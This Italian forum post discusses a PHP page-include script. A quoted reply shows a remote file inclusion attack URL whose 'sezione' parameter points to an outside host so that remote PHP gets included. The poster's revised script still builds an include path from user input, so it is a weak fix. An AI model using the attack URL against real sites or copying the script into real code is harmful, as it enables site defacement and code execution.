'inchia e chi se ne era accorto? azz[supersaibal]Originariamente inviato da skidx
A me non sembra tanto sicuro, basta passare un url in sezione, invece che in pagina.Codice PHP:
$pagina = $_GET['sezione'] . '/inc_' . $_GET['pagina'] . '.php';
Quindi con
http://www.sitobastardo.com/inc_defacciamitutto.php
basta chiamare
tuoscript.php?pagina=defacciamitutto&sezione=http://www.sitobastardo.com
Almeno così mi sembra, se non mi sto rincoglionendo del tutto![]()
Per stare sicuro, nella variabile $pagina, prima di sezione, puoi metterci l'url del tuo sito. [/supersaibal]
così?
Codice PHP:
<?php
include 'su.php';
include 'sx.php';
$pagina = 'centro.php';
if (isset($_GET['pagina']) && isset($_GET['sezione']))
{
$pagina = $_GET['sezione'] . '/inc_' . $_GET['pagina'] . '.php';
}
if (!file_exists ($pagina))
{
$pagina = 'errore.php';
}
$pagina = "http://nomesito/" . $pagina;
include $pagina;
include 'giu.php';
?>